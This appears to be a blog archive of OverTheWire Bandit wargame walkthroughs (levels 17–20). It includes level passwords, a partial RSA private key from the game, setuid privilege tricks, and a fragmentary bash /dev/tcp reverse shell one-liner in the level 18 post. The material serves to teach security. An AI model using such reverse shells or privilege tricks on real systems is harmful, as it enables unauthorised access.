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Showing posts from March, 2021

Bandit 20 Over The Wire

Lessons Learned using nc to create a steady connection, also on background and foreground processes Logging in On a kali vm/ linux machine Type: ssh -p 2220 GbKksEFF4yrVs6il55v6gwY5aVje5f0j Completing The Challenge The Goal: There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21). The Solution: bandit20@bandit:~$ nc -l -p 2000 ^Z [1]+  Stopped                 nc -l -p 2000 bandit20@bandit:~$ ./suconnect 2000 ^Z [2]+  Stopped                 ./suconnect 2000 bandit20@bandit:~$ fg 1 nc -...

Bandit 19 Over The Wire

Lessons Learned some files change your euid/ effective user id, which allows you to act as another user through them. Logging in On a kali vm/ linux machine Type: ssh -p 2220 IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Completing The Challenge The Goal: To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary. The Solution: bandit19@bandit:~$ id uid=11019(bandit19) gid=11019(bandit19) groups=11019(bandit19) bandit19@bandit:~$ ./bandit20-do id uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)  bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20 GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/ 0 > & 1  

Bandit 17 Over The Wire

Lessons Learned Using diff to find differences in files Logging in On a kali vm/ linux machine Type: ssh -p 2220 cluFn7wTiGryunymYOu4RcffSxQluehd Starting in Bandit16: -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama +TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwU...